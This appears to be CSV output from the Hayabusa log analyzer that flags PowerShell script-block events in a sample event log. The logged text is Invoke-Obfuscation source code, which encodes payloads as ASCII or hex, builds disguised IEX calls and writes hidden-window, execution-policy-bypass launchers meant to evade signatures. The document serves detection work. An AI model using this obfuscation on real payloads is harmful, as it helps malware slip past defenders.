[Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) 